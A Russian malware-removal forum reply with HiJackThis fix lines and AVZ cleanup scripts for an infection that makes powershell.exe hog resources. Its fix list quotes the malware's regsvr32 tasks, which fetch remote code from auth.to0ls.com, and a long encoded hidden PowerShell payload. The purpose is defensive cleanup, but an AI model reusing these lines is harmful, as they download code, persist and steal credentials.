Powershall.exe жрет ресурсы.

SQx · Отправлено: **03:21, 11-07-2019** | #2

Здравствуйте,

Удалите остатки от антивируса Avast утилитой Avast Remover.

HiJackThis профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

Код:

O7 - IPSec: Name: netbc (2019/07/04) - {152ddff7-3475-42fc-967e-63f860d58942} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: Microsoft Assist Job - C:\Windows\system32\regsvr32.exe /u /s /i:http://auth.to0ls.com:443/antivirus.php scrobj.dll
O22 - Task: SystemFlushDns - C:\Windows\system32\regsvr32.exe /u /s /i:http://auth.to0ls.com:443/antivirus.php scrobj.dll
O25 - WMI Event: Systems Manage Consumer - Systems Manage Filter - Event="__InstanceModificationEvent WITHIN 5601 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  powershell.exe -NoP -NonI -W Hidden -E bgBlAHQAIABzAHQAYQByAHQAIABSAHAAYwBTAHMAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFIAcABjAEwAbwBjAGEAdABvAHIAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFIAZQBtAG8AdABlAFIAZQBnAGkAcwB0AHIAeQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAG4AZQB0ACAAcwB0AGEAcgB0ACAAUgBwAGMARQBwAHQATQBhAHAAcABlAHIAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFcAaQBuAG0AZwBtAHQAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFcAaQBuAFIATQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKACQAcABpAG4AIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgBuAGUAdAB3AG8AcgBrAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuAHAAaQBuAGcADQAKACQAcwBlAD0AQAAoACgAJwBhAHUAdABoAC4AdABvADAAbABzAC4AYwBvAG0AJwApACwAKAAnAG0AYQBpAGwALgB0AG8AMABsAHMALgBjAG8AbQAnACkAKQANAAoAJABhAHYAZwBzACAAPQAgAEAAKAApAA0ACgAkAG4AaQBjACAAPQAgACcAYQB1AHQAaAAuAHQAbwAwAGwAcwAuAGMAbwBtACcADQAKACQAdABtAHAAIAA9ACAAMAANAAoAJABkAHQAZgBsAGEAZwAgAD0AIAAkAFQAcgB1AGUADQAKACQAdABtAHAAIAA9ACAAKAAkAHAAaQBuAC4AcwBlAG4AZAAoACQAcwBlAFsAMABdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKAGkAZgAgACgAJAB0AG0AcAAgAC0AbgBlACAAMAApAHsADQAKACAAIAAgACAAJABkAHQAZgBsAGEAZwAgAD0AIAAkAFQAcgB1AGUADQAKAH0AZQBsAHMAZQB7AA0ACgAgACAAIAAgACQAdABtAHAAIAA9ACAAKAAkAHAAaQBuAC4AcwBlAG4AZAAoACQAcwBlAFsAMQBdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKACAAIAAgACAAaQBmACAAKAAkAHQAbQBwACAALQBuAGUAIAAwACkAewANAAoAIAAgACAAIAAgACAAIAAgACQAZAB0AGYAbABhAGcAIAA9ACAAJABGAGEAbABzAGUADQAKACAAIAAgACAAIAAgACAAIAAkAG4AaQBjACAAPQAgACQAcwBlAFsAMQBdAA0ACgAgACAAIAAgAH0AZQBsAHMAZQB7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADsAJABpACsAKwApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAG4AcwBsAG8AbwBrAHUAcAAgAD0AIAAmAG4AcwBsAG8AbwBrAHUAcAAuAGUAeABlACAAJABzAGUAWwAkAGkAXQAgADgALgA4AC4AOAAuADgADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBzAGwAbwBvAGsAdQBwACAAPQAgACQAbgBzAGwAbwBvAGsAdQBwAC4AcgBlAHAAbABhAGMAZQAoACIAOAAuADgALgA4AC4AOAAiACwAIgB4AHgAeAB4AHgAeAB4AHgAIgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHAAYQB0AHQAZQByAG4APQAiACgAMgA1AFsAMAAtADUAXQB8ADIAWwAwAC0ANABdAFwAZAB8AFsAMAAtADEAXQBcAGQAewAyAH0AfABbADEALQA5AF0APwBcAGQAKQBcAC4AKAAyADUAWwAwAC0ANQBdAHwAMgBbADAALQA0AF0AXABkAHwAWwAwAC0AMQBdAFwAZAB7ADIAfQB8AFsAMQAtADkAXQA/AFwAZAApAFwALgAoADIANQBbADAALQA1AF0AfAAyAFsAMAAtADQAXQBcAGQAfABbADAALQAxAF0AXABkAHsAMgB9AHwAWwAxAC0AOQBdAD8AXABkACkAXAAuACgAMgA1AFsAMAAtADUAXQB8ADIAWwAwAC0ANABdAFwAZAB8AFsAMAAtADEAXQBcAGQAewAyAH0AfABbADEALQA5AF0APwBcAGQAKQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAKAAkAG4AcwBsAG8AbwBrAHUAcAAgAC0AbQBhAHQAYwBoACAAJABwAGEAdAB0AGUAcgBuACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHMAZQBbACQAaQBdACAAPQAgACQAbQBhAHQAYwBoAGUAcwBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQBlAGwAcwBlAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABzAGUAWwAkAGkAXQAgAD0AIAAiADgALgA4AC4AOAAuADgAIgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAhACgAJABzAGUAWwAwAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADgALgA4AC4AOAAuADgAIgApACkAIAAtAGEAbgBkACAAIQAoACQAcwBlAFsAMQBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA4AC4AOAAuADgALgA4ACIAKQApACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABzAGUAWwAwAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAkAHMAZQBbADEAXQApACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZAB0AGYAbABhAGcAIAA9ACAAJABGAGEAbABzAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AZQBsAHMAZQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZAB0AGYAbABhAGcAIAA9ACAAJABUAHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQBlAGwAcwBlAGkAZgAoACQAcwBlAFsAMABdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA4AC4AOAAuADgALgA4ACIAKQApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBpAGMAIAA9ACAAJABzAGUAWwAxAF0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZAB0AGYAbABhAGcAIAA9ACAAJABGAGEAbABzAGUADQAKACAAIAAgACAAIAAgACAAIAB9AGUAbABzAGUAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAGkAYwAgAD0AIAAkAHMAZQBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAHQAZgBsAGEAZwAgAD0AIAAkAEYAYQBsAHMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAfQANAAoAaQBmACgAJABkAHQAZgBsAGEAZwApAHsADQAKACAAIAAgACAAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADsAJABpACsAKwApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHMAdQBtACAAPQAgADAADQAKACAAIAAgACAAIAAgACAAIAAkAGMAbwB1AG4AdAAgAD0AIAAwAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAKAAkAGoAPQAxADsAJABqACAALQBsAGUAIAA0ADsAJABqACsAKwApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAdABtAHAAIAA9ACAAKAAkAHAAaQBuAC4AcwBlAG4AZAAoACQAcwBlAFsAJABpAF0AKQApAC4AUgBvAHUAbgBkAHQAcgBpAHAAVABpAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHQAbQBwACAALQBuAGUAIAAwACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGMAbwB1AG4AdAAgACsAPQAgADEADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcwB1AG0AIAArAD0AIAAkAHQAbQBwAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAdgBnAHMAIAArAD0AIAAkAHMAdQBtAC8AJABjAG8AdQBuAHQADQAKACAAIAAgACAAIAAgACAAIAB9AGUAbABzAGUAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABhAHYAZwBzACAAKwA9ACAAMAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQAgAC0AZQBxACAAMAApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAGwAZQAgADMAMAAwACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAG4AZQAgADAAKQApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAGkAYwAgAD0AIAAkAHMAZQBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGkAIAAtAGUAcQAgADEAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAYQB2AGcAcwBbADEAXQAgAC0AbgBlACAAMAApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMQBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAG4AZQAgADAAKQApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgByAGUAYQBrAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AZQBsAHMAZQB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAGkAYwAgAD0AIAAkAHMAZQBbADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACgAJwA6ACcAKwAnADQANAAzACcAKQANAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkADQAKAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsADQAKACAAIAAgACAAJAB2AGUAcgBfAHQAbQBwAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACQAdgBlAHIAXwB0AG0AcAApAHsADQAKACAAIAAgACAAIAAgACAAIABJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdwAvAGEAbgB0AGkAdgBpAHIAdQBzAC4AcABzADEAIgApAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4ADQAKACAAIAAgACAAfQANAAoAfQANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgBkAG8AdwBfAEMAbwByAGUAXwBGAGwAdQBzAGgAXwBDAGEAYwBoACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFMAeQBzAHQAZQBtAHMAIABNAGEAbgBhAGcAZQAnAH0AIAB8AFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQADQAKAA0ACgBbAGEAcgByAGEAeQBdACQAcABzAGkAZABzAD0AIABnAGUAdAAtAHAAcgBvAGMAZQBzAHMAIAAtAG4AYQBtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAfABzAG8AcgB0ACAAYwBwAHUAIAAtAEQAZQBzAGMAZQBuAGQAaQBuAGcAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AaQBkAH0ADQAKACQAdABjAHAAYwBvAG4AbgAgAD0AIABuAGUAdABzAHQAYQB0ACAALQBhAG4AbwBwACAAdABjAHAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAA0ACgB7AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBlACAALQBlAHEAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAAgACAAIAAgAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAJABwAHMAaQBkAHMAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACQAbABpAG4AZQBbAC0AMQBdACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAMAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAFIAdQBuAEQARABPAFMAIAAiAGMAbwBoAGUAcgBuAGUAYwBlAC4AZQB4AGUAIgAgACIANABGAC0ARQAyAC0ARABFAC0ANgBGAC0AQgBCAC0AMgA3AC0AOABFAC0ANQA2AC0AQwAyAC0AMwBFAC0AOQAwAC0ANAAzAC0AMgBGAC0AMgAxAC0ARgA2AC0AQwA4ACIADQAKAEsAaQBsAGwAQgBvAHQAKAAnAFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAewANAAoAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKACAAIAAgACAAaQBmACAAKAAoACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADMAMwAzADMAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABlAHYAaQBkAD0AJABsAGkAbgBlAFsALQAxAF0ADQAKACAAIAAgACAAIAAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAGkAZAAgACQAZQB2AGkAZAAgAHwAIABzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AZgBvAHIAYwBlAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGkAZgAgACgAIQAkAGUAeABpAHMAdAAgAC0AYQBuAGQAIAAoACQAcABzAGkAZABzAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA4ACkAKQANAAoAewANAAoAIAAgACAAIAAkAGMAbQBkAG0AbwBuAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBOAG8AUAAgAC0ATgBvAG4ASQAgAC0AVwAgAEgAaQBkAGQAZQBuACAAYAAiAGAAJABtAG8AbgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAG8AbgAnAF0ALgBWAGEAbAB1AGUAOwBgACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoAIAAgACAAIAAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApAA0ACgB9AA0ACgANAAoAJAB0AGkAbQBlAG4AbwB3ACAAPQAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAFMAdABhAHIAdAAgACgARwBlAHQALQBEAGEAdABlACAAIgAwADEALwAwADEALwAxADkANwAwACIAKQAgAC0ARQBuAGQAIAAoAEcAZQB0AC0ARABhAHQAZQApACkALgBUAG8AdABhAGwAUwBlAGMAbwBuAGQAcwANAAoAJABmAGwAYQBnAHQAaQBtAGUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgBsAGEAZwAnAF0ALgBWAGEAbAB1AGUADQAKAGkAZgAoACgAJAB0AGkAbQBlAG4AbwB3AC0AJABmAGwAYQBnAHQAaQBtAGUAKQAgAC0AZwB0ACAAMQA4ADAAMAAwACkAewANAAoAIAAgACAAIAAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkADQAKACAAIAAgACAAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBmAGwAYQBnACcAIAAsACQAdABpAG0AZQBuAG8AdwApAA0ACgAgACAAIAAgACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAIAAgACAAIAAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAIAAgACAAIAAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAJABhACwAIAAkAE4AVABMAE0APQAgAEcAZQB0AC0AYwByAGUAZABzACAAJABtAGkAbQBpACAAJABtAGkAbQBpAA0ACgAgACAAIAAgACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpAHAAcwB1ACcAXQAuAFYAYQBsAHUAZQANAAoAIAAgACAAIAAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgBkAG8AdwBfAEMAbwByAGUAXwBGAGwAdQBzAGgAXwBDAGEAYwBoACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAMQA3ACcAXQAuAFYAYQBsAHUAZQANAAoAIAAgACAAIAAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgBkAG8AdwBfAEMAbwByAGUAXwBGAGwAdQBzAGgAXwBDAGEAYwBoACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBjAGIAYQApAA0ACgAgACAAIAAgAEkAbgB2AG8AawBlAC0AQgByAGUAeABpAHQAIAAtAHMAYwBjAGMAYwBjAGMAIAAkAHMAYwAgAC0AaQBwAHMAdQAgACQAaQBwAHMAdQAgAC0AaQAxADcAIAAkAGkAMQA3ACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAGEAIAAkAGEAIAAtAE4AVABMAE0AIAAkAE4AVABMAE0ADQAKAH0ADQAKAGUAeABpAHQA

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
 TerminateProcessByName('c:\windows\temp\cohernece.exe');
 QuarantineFile('C:\Windows\System32\cwlog.dtl','');
 QuarantineFile('C:\Windows\system32\start','');
 QuarantineFile('c:\windows\temp\cohernece.exe','');
 DeleteFile('c:\windows\temp\cohernece.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\RunOnce','c732608','x64');
 DeleteSchedulerTask('Microsoft\Windows\PMS\ResetDTL');
 DeleteSchedulerTask('Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask');
 DeleteSchedulerTask('Microsoft Assist Job');
 DeleteSchedulerTask('Microsoft\Windows\Time Synchronization\SynchronizeTime');
 DeleteSchedulerTask('SystemFlushDns');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

Код:

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

